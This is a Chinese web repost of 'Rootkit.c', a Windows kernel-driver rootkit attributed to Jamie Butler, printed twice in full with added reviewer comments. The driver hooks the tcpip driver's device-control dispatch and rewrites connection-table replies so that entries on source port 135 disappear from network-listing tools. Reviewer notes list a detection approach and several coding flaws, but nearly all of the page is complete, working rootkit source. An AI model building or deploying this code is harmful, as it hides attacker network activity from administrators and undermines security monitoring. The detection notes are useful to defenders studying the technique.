HideTcpip.c


概述：隐藏 TCP 端口（来自看雪论坛）。下面的 Rootkit.c 由 Jamie Butler 编写，是一个 Windows 内核驱动示例：它挂钩 \Device\Tcp 所属驱动的 IRP_MJ_DEVICE_CONTROL 派遣例程，对查询 TCP 连接表的 IOCTL_TCP_QUERY_INFORMATION_EX 请求附加完成例程，把源端口为 135 的条目的 status 字段清零（代码注释中标为 "Invisible"），从而让读取连接表的工具看不到该端口。页面下方的两份代码是同一份源文件的两次转贴，均因网页抓取而出现标识符大小写错乱与丢字。

隐藏 TCP 端口（来自看雪论坛）

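/////////////////////////////////////////////////////////////////////////////////////////
// Filename: Rootkit.c
//
// Author: Jamie Butler
// Email:  [email protected] or [email protected]
//
// Description: This is where the work gets done.
//
// Version: 1.0
//
// Reviewer notes (listing reconstructed from a garbled web copy; identifiers
// such as NULL/ULONG/RtlInitUnicodeString/IRP_MJ_DEVICE_CONTROL restored):
//  * Technique: the driver resolves \Device\Tcp, takes the owning driver object
//    (tcpip) and swaps its IRP_MJ_DEVICE_CONTROL dispatch pointer for
//    HookedDeviceControl.  A METHOD_NEITHER IOCTL_TCP_QUERY_INFORMATION_EX
//    request for the TCP connection table (toi_id 0x101/0x102/0x110) gets a
//    completion routine that zeroes the status field of every returned entry
//    whose source port is 135, the value the listing's own table calls
//    "Invisible".
//  * Detection: compare each MajorFunction[] entry of the tcpip driver object
//    with the tcpip image range; an entry pointing outside it is this hook.
//  * Known weaknesses kept as in the original (flagged inline, not changed):
//    the caller's Type3InputBuffer is read without ProbeForRead/__try, the
//    (LONG) pointer casts only work on 32-bit builds, the upper driver's
//    completion context and control flags are discarded, and unload does not
//    wait for in-flight IRPs.  The TDI \Device\Tcp interface this depends on
//    is deprecated on Windows Vista and later.
//  * Globals pfile_tcp, pDev_tcp, pDrv_tcpip, oldIrpMjDeviceControl, the
//    REQINFO / CONNINFO101 / CONNINFO102 / CONNINFO110 layouts and HTONS come
//    from Rootkit.h (not shown on this page).
//
#include "ntddk.h"
#include "tdiinfo.h"
//#include "stdio.h"
//#include "stdlib.h"
#include "Rootkit.h"

// Source (local) port whose connection-table entries are hidden.
#define HIDDEN_SRC_PORT 135

// Driver entry point: registers the unload handler and installs the TCP hook.
// Returns the hook's failure status so the driver does not stay loaded with a
// half-installed hook.
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    NTSTATUS ntStatus;

    UNREFERENCED_PARAMETER(RegistryPath);

    oldIrpMjDeviceControl = NULL;
    DriverObject->DriverUnload = RootkitUnload;

    ntStatus = InstallTCPDriverHook();
    if (!NT_SUCCESS(ntStatus))
        return ntStatus;

    return STATUS_SUCCESS;
}

// Resolves \Device\Tcp, keeps the returned file-object reference (released in
// RootkitUnload) and replaces the owning driver's IRP_MJ_DEVICE_CONTROL
// dispatch entry with HookedDeviceControl.
// Returns the IoGetDeviceObjectPointer status on failure, STATUS_SUCCESS otherwise.
NTSTATUS InstallTCPDriverHook()
{
    NTSTATUS       ntStatus;
    UNICODE_STRING deviceTcpUnicodeString;
    WCHAR          deviceTcpNameBuffer[] = L"\\Device\\Tcp";

    pfile_tcp  = NULL;
    pDev_tcp   = NULL;
    pDrv_tcpip = NULL;

    RtlInitUnicodeString(&deviceTcpUnicodeString, deviceTcpNameBuffer);

    // The file object returned here must stay referenced for as long as
    // pDev_tcp / pDrv_tcpip are used; RootkitUnload dereferences it.
    ntStatus = IoGetDeviceObjectPointer(&deviceTcpUnicodeString, FILE_READ_DATA,
                                        &pfile_tcp, &pDev_tcp);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrint("读取失败!");
        return ntStatus;
    }
    DbgPrint("读取成功!");

    pDrv_tcpip = pDev_tcp->DriverObject;

    // Save the original dispatch routine so HookedDeviceControl can forward to
    // it and RootkitUnload can restore it.  NOTE(review): the (LONG) casts
    // truncate pointers on 64-bit builds; InterlockedExchangePointer would be
    // the portable form.
    oldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL];
    if (oldIrpMjDeviceControl)
        InterlockedExchange((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL],
                            (LONG)HookedDeviceControl);

    return STATUS_SUCCESS;
}

// Replacement IRP_MJ_DEVICE_CONTROL dispatch for the TCP driver.  Every IRP is
// forwarded to the saved original routine; the only change is that a
// METHOD_NEITHER IOCTL_TCP_QUERY_INFORMATION_EX request for the TCP connection
// table (entity CO_TL_ENTITY, toi_id 0x101, 0x102 or 0x110) gets
// IoCompletionRoutine attached so the reply can be edited on the way back.
//
// Review notes:
//  * Type3InputBuffer is the requestor's raw pointer.  For a user-mode caller
//    it is read here without ProbeForRead inside __try/__except, so a bad
//    pointer bugchecks instead of failing the request.
//  * irpStack->Control is reset, which drops any SL_INVOKE_ON_ERROR /
//    SL_INVOKE_ON_CANCEL flags the upper driver set, and irpStack->Context is
//    overwritten without being saved.  The original completion routine (if
//    any) is therefore later called with a NULL context and never on
//    error/cancel, and the REQINFO leaks on those paths.
NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    PIO_STACK_LOCATION irpStack;
    ULONG              ioTransferType;
    TDIObjectID       *inputBuffer;
    PREQINFO           reqInfo;

    // Current stack location: holds the function code and IOCTL parameters.
    irpStack = IoGetCurrentIrpStackLocation(Irp);

    switch (irpStack->MajorFunction)
    {
    case IRP_MJ_DEVICE_CONTROL:
        if ((irpStack->MinorFunction == 0) &&
            (irpStack->Parameters.DeviceIoControl.IoControlCode == IOCTL_TCP_QUERY_INFORMATION_EX))
        {
            // The low two bits of an IOCTL code are the transfer method; the
            // input buffer is found in Type3InputBuffer only for METHOD_NEITHER.
            ioTransferType = irpStack->Parameters.DeviceIoControl.IoControlCode;
            ioTransferType &= 3;
            if (ioTransferType == METHOD_NEITHER)
            {
                inputBuffer = (TDIObjectID *) irpStack->Parameters.DeviceIoControl.Type3InputBuffer;

                // CO_TL_ENTITY is for TCP and CL_TL_ENTITY is for UDP.
                // A request with no input buffer is passed through untouched
                // (the original dereferenced it unconditionally).
                if ((inputBuffer != NULL) &&
                    (inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY))
                {
                    DbgPrint("input buffer %x\n", inputBuffer);
                    if ((inputBuffer->toi_id == 0x101) ||
                        (inputBuffer->toi_id == 0x102) ||
                        (inputBuffer->toi_id == 0x110))
                    {
                        // Per-request state for the completion routine.  If the
                        // allocation fails the IRP is simply forwarded unmodified;
                        // the original wrote through the NULL result.
                        reqInfo = (PREQINFO) ExAllocatePool(NonPagedPool, sizeof(REQINFO));
                        if (reqInfo != NULL)
                        {
                            // Save old completion routine if present.
                            reqInfo->oldCompletion = irpStack->CompletionRoutine;
                            reqInfo->ReqType       = inputBuffer->toi_id;

                            // Call our completion routine only if the IRP succeeds.
                            irpStack->Control = 0;
                            irpStack->Control |= SL_INVOKE_ON_SUCCESS;
                            irpStack->Context = reqInfo;
                            irpStack->CompletionRoutine = (PIO_COMPLETION_ROUTINE) IoCompletionRoutine;
                        }
                    }
                }
            }
        }
        break;

    default:
        break;
    }

    return oldIrpMjDeviceControl(DeviceObject, Irp);
}

// Completion routine attached by HookedDeviceControl.  Runs after the TCP
// driver has filled Irp->UserBuffer with an array of connection entries: walks
// the array in the layout matching the saved request type, zeroes the status of
// every entry whose source port is HIDDEN_SRC_PORT, frees the REQINFO, then
// chains to the completion routine that originally sat in this stack location.
//
// Connection status values (as listed in the original):
//   0 = Invisible
//   1 = CLOSED
//   2 = LISTENING
//   3 = SYN_SENT
//   4 = SYN_RECEIVED
//   5 = ESTABLISHED
//   6 = FIN_WAIT_1
//   7 = FIN_WAIT_2
//   8 = CLOSE_WAIT
//   9 = CLOSING
//   ...
//
// Review notes:
//  * Irp->UserBuffer is written directly.  NOTE(review): this is only valid if
//    the request completes in the requestor's address space; not verified here.
//  * The previous completion routine receives a NULL context (HookedDeviceControl
//    did not save the original one) and is only chained when StackCount > 1.
//  * An IRP completing after RootkitUnload has run would call into unmapped
//    code; nothing waits for in-flight requests.
NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context)
{
    PVOID                  OutputBuffer;
    DWORD                  NumOutputBuffers;
    PIO_COMPLETION_ROUTINE p_compRoutine;
    DWORD                  i;
    DWORD                  reqType;

    OutputBuffer  = Irp->UserBuffer;
    p_compRoutine = ((PREQINFO)Context)->oldCompletion;
    reqType       = ((PREQINFO)Context)->ReqType;

    // Entry count comes from the byte count the driver reported in
    // IoStatus.Information; a trailing partial entry, if any, is ignored.
    // (The original comments said "Web connections", but the port tested is 135.)
    if (reqType == 0x101)
    {
        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO101);
        for (i = 0; i < NumOutputBuffers; i++)
        {
            if (HTONS(((PCONNINFO101)OutputBuffer)[i].src_port) == HIDDEN_SRC_PORT)
                ((PCONNINFO101)OutputBuffer)[i].status = 0;
        }
    }
    else if (reqType == 0x102)
    {
        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO102);
        for (i = 0; i < NumOutputBuffers; i++)
        {
            if (HTONS(((PCONNINFO102)OutputBuffer)[i].src_port) == HIDDEN_SRC_PORT)
                ((PCONNINFO102)OutputBuffer)[i].status = 0;
        }
    }
    else if (reqType == 0x110)
    {
        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO110);
        for (i = 0; i < NumOutputBuffers; i++)
        {
            if (HTONS(((PCONNINFO110)OutputBuffer)[i].src_port) == HIDDEN_SRC_PORT)
                ((PCONNINFO110)OutputBuffer)[i].status = 0;
        }
    }

    // The REQINFO was allocated in HookedDeviceControl; this is its only free.
    ExFreePool(Context);

    if ((Irp->StackCount > (ULONG)1) && (p_compRoutine != NULL))
    {
        return (p_compRoutine)(DeviceObject, Irp, NULL);
    }
    else
    {
        return Irp->IoStatus.Status;
    }
}

// Unload handler: puts the original IRP_MJ_DEVICE_CONTROL pointer back into the
// TCP driver object and drops the \Device\Tcp file-object reference taken in
// InstallTCPDriverHook.  NOTE(review): IRPs that still carry IoCompletionRoutine
// in their stack location are not waited for, so unloading with a query in
// flight is unsafe.
NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)
{
    UNREFERENCED_PARAMETER(DriverObject);

    if (oldIrpMjDeviceControl)
        InterlockedExchange((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL],
                            (LONG)oldIrpMjDeviceControl);

    if (pfile_tcp != NULL)
        ObDereferenceObject(pfile_tcp);
    pfile_tcp = NULL;

    return STATUS_SUCCESS;
}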

 

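/////////////////////////////////////////////////////////////////////////////////////////
// Filename: Rootkit.c
//
// Author: Jamie Butler
// Email:  [email protected] or [email protected]
//
// Description: This is where the work gets done.
//
// Version: 1.0
//
// Reviewer notes (this copy of the listing had lost arguments in the web
// transfer: IoGetDeviceObjectPointer was missing its access mask and file-object
// output, and the chained completion call was missing the Irp; both restored):
//  * Technique: resolve \Device\Tcp, take its owning driver object (tcpip) and
//    swap that object's IRP_MJ_DEVICE_CONTROL dispatch pointer.  For a
//    METHOD_NEITHER IOCTL_TCP_QUERY_INFORMATION_EX that asks for the TCP
//    connection table (toi_id 0x101/0x102/0x110) a completion routine is
//    attached that sets status = 0 ("Invisible" in the listing's own table)
//    on every entry whose source port is 135.
//  * Detection: any MajorFunction[] entry of the tcpip driver object that does
//    not point inside the tcpip image is this kind of hook.
//  * Weaknesses left as in the original and flagged inline: unprobed read of
//    the caller's Type3InputBuffer, 32-bit-only (LONG) pointer casts, the upper
//    driver's completion context/flags are discarded, and unload does not wait
//    for in-flight IRPs.  The TDI \Device\Tcp interface is deprecated on
//    Windows Vista and later.
//  * pfile_tcp, pDev_tcp, pDrv_tcpip, oldIrpMjDeviceControl, REQINFO, the
//    CONNINFO1xx layouts and HTONS are declared in Rootkit.h (not shown).
//
#include "ntddk.h"
#include "tdiinfo.h"
//#include "stdio.h"
//#include "stdlib.h"
#include "Rootkit.h"

// Source (local) port whose connection-table entries are hidden.
#define HIDDEN_SRC_PORT 135

// Driver entry point: sets the unload handler and installs the TCP hook,
// propagating the hook's failure status so a failed install unloads the driver.
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    NTSTATUS ntStatus;

    UNREFERENCED_PARAMETER(RegistryPath);

    oldIrpMjDeviceControl = NULL;
    DriverObject->DriverUnload = RootkitUnload;

    ntStatus = InstallTCPDriverHook();
    if (!NT_SUCCESS(ntStatus))
        return ntStatus;

    return STATUS_SUCCESS;
}

// Looks up \Device\Tcp, keeps the file-object reference (released in
// RootkitUnload) and installs HookedDeviceControl as the owning driver's
// IRP_MJ_DEVICE_CONTROL dispatch routine.
// Returns the IoGetDeviceObjectPointer status on failure, STATUS_SUCCESS otherwise.
NTSTATUS InstallTCPDriverHook()
{
    NTSTATUS       ntStatus;
    UNICODE_STRING deviceTcpUnicodeString;
    WCHAR          deviceTcpNameBuffer[] = L"\\Device\\Tcp";

    pfile_tcp  = NULL;
    pDev_tcp   = NULL;
    pDrv_tcpip = NULL;

    RtlInitUnicodeString(&deviceTcpUnicodeString, deviceTcpNameBuffer);

    // The returned file object carries the reference that must be held while
    // pDev_tcp / pDrv_tcpip are in use; RootkitUnload dereferences it.
    ntStatus = IoGetDeviceObjectPointer(&deviceTcpUnicodeString, FILE_READ_DATA,
                                        &pfile_tcp, &pDev_tcp);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrint("读取失败!");
        return ntStatus;
    }
    DbgPrint("读取成功!");

    pDrv_tcpip = pDev_tcp->DriverObject;

    // Remember the original dispatch routine for forwarding and for unload.
    // NOTE(review): casting function pointers to LONG is 32-bit only;
    // InterlockedExchangePointer is the portable call.
    oldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL];
    if (oldIrpMjDeviceControl)
        InterlockedExchange((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL],
                            (LONG)HookedDeviceControl);

    return STATUS_SUCCESS;
}

// Hooked IRP_MJ_DEVICE_CONTROL dispatch.  Forwards every IRP to the saved
// original routine; for a METHOD_NEITHER IOCTL_TCP_QUERY_INFORMATION_EX naming
// entity CO_TL_ENTITY and toi_id 0x101/0x102/0x110 it first attaches
// IoCompletionRoutine with a REQINFO context so the reply can be edited.
//
// Review notes:
//  * Type3InputBuffer is the requestor's raw pointer and is read without
//    ProbeForRead inside __try/__except, so a bad user pointer bugchecks.
//  * Resetting irpStack->Control drops the upper driver's SL_INVOKE_ON_ERROR /
//    SL_INVOKE_ON_CANCEL flags, and irpStack->Context is overwritten unsaved;
//    the previous completion routine thus gets a NULL context and is never run
//    on error/cancel, where the REQINFO also leaks.
NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    PIO_STACK_LOCATION irpStack;
    ULONG              ioTransferType;
    TDIObjectID       *inputBuffer;
    PREQINFO           reqInfo;

    // Current stack location: function codes and IOCTL parameters live here.
    irpStack = IoGetCurrentIrpStackLocation(Irp);

    switch (irpStack->MajorFunction)
    {
    case IRP_MJ_DEVICE_CONTROL:
        if ((irpStack->MinorFunction == 0) &&
            (irpStack->Parameters.DeviceIoControl.IoControlCode == IOCTL_TCP_QUERY_INFORMATION_EX))
        {
            // Low two bits of the IOCTL code select the transfer method; only
            // METHOD_NEITHER puts the input buffer in Type3InputBuffer.
            ioTransferType = irpStack->Parameters.DeviceIoControl.IoControlCode;
            ioTransferType &= 3;
            if (ioTransferType == METHOD_NEITHER)
            {
                inputBuffer = (TDIObjectID *) irpStack->Parameters.DeviceIoControl.Type3InputBuffer;

                // CO_TL_ENTITY is for TCP and CL_TL_ENTITY is for UDP.  A request
                // without an input buffer is forwarded untouched (the original
                // dereferenced it unconditionally).
                if ((inputBuffer != NULL) &&
                    (inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY))
                {
                    DbgPrint("input buffer %x\n", inputBuffer);
                    if ((inputBuffer->toi_id == 0x101) ||
                        (inputBuffer->toi_id == 0x102) ||
                        (inputBuffer->toi_id == 0x110))
                    {
                        // Per-request state for the completion routine; on
                        // allocation failure the IRP is forwarded unmodified
                        // instead of writing through a NULL pointer.
                        reqInfo = (PREQINFO) ExAllocatePool(NonPagedPool, sizeof(REQINFO));
                        if (reqInfo != NULL)
                        {
                            // Save old completion routine if present.
                            reqInfo->oldCompletion = irpStack->CompletionRoutine;
                            reqInfo->ReqType       = inputBuffer->toi_id;

                            // Invoke our completion routine only on success.
                            irpStack->Control = 0;
                            irpStack->Control |= SL_INVOKE_ON_SUCCESS;
                            irpStack->Context = reqInfo;
                            irpStack->CompletionRoutine = (PIO_COMPLETION_ROUTINE) IoCompletionRoutine;
                        }
                    }
                }
            }
        }
        break;

    default:
        break;
    }

    return oldIrpMjDeviceControl(DeviceObject, Irp);
}

// Completion routine set by HookedDeviceControl.  Once the TCP driver has
// filled Irp->UserBuffer with connection entries, the array is walked in the
// layout matching the saved request type and the status of every entry whose
// source port is HIDDEN_SRC_PORT is set to 0.  The REQINFO is freed and the
// completion routine that was originally in this stack location is chained.
//
// Connection status values (as listed in the original):
//   0 = Invisible
//   1 = CLOSED
//   2 = LISTENING
//   3 = SYN_SENT
//   4 = SYN_RECEIVED
//   5 = ESTABLISHED
//   6 = FIN_WAIT_1
//   7 = FIN_WAIT_2
//   8 = CLOSE_WAIT
//   9 = CLOSING
//   ...
//
// Review notes:
//  * Irp->UserBuffer is written directly; NOTE(review): valid only if the
//    request completes in the requestor's address space - not verified here.
//  * The chained routine receives a NULL context (the original one was not
//    saved) and is only called when StackCount > 1.
//  * Nothing prevents RootkitUnload from running while such an IRP is pending.
NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context)
{
    PVOID                  OutputBuffer;
    DWORD                  NumOutputBuffers;
    PIO_COMPLETION_ROUTINE p_compRoutine;
    DWORD                  i;
    DWORD                  reqType;

    OutputBuffer  = Irp->UserBuffer;
    p_compRoutine = ((PREQINFO)Context)->oldCompletion;
    reqType       = ((PREQINFO)Context)->ReqType;

    // Entry count is derived from the byte count in IoStatus.Information; a
    // trailing partial entry is ignored.  (The original comments said "Web
    // connections" but the port compared is 135.)
    if (reqType == 0x101)
    {
        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO101);
        for (i = 0; i < NumOutputBuffers; i++)
        {
            if (HTONS(((PCONNINFO101)OutputBuffer)[i].src_port) == HIDDEN_SRC_PORT)
                ((PCONNINFO101)OutputBuffer)[i].status = 0;
        }
    }
    else if (reqType == 0x102)
    {
        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO102);
        for (i = 0; i < NumOutputBuffers; i++)
        {
            if (HTONS(((PCONNINFO102)OutputBuffer)[i].src_port) == HIDDEN_SRC_PORT)
                ((PCONNINFO102)OutputBuffer)[i].status = 0;
        }
    }
    else if (reqType == 0x110)
    {
        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO110);
        for (i = 0; i < NumOutputBuffers; i++)
        {
            if (HTONS(((PCONNINFO110)OutputBuffer)[i].src_port) == HIDDEN_SRC_PORT)
                ((PCONNINFO110)OutputBuffer)[i].status = 0;
        }
    }

    // Allocated in HookedDeviceControl; freed exactly once here.
    ExFreePool(Context);

    if ((Irp->StackCount > (ULONG)1) && (p_compRoutine != NULL))
    {
        return (p_compRoutine)(DeviceObject, Irp, NULL);
    }
    else
    {
        return Irp->IoStatus.Status;
    }
}

// Unload handler: restores the TCP driver's original IRP_MJ_DEVICE_CONTROL
// pointer and releases the \Device\Tcp file-object reference.
// NOTE(review): in-flight IRPs still pointing at IoCompletionRoutine are not
// waited for, so unloading during a connection-table query is unsafe.
NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)
{
    UNREFERENCED_PARAMETER(DriverObject);

    if (oldIrpMjDeviceControl)
        InterlockedExchange((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL],
                            (LONG)oldIrpMjDeviceControl);

    if (pfile_tcp != NULL)
        ObDereferenceObject(pfile_tcp);
    pfile_tcp = NULL;

    return STATUS_SUCCESS;
}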


欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/langs/1223101.html
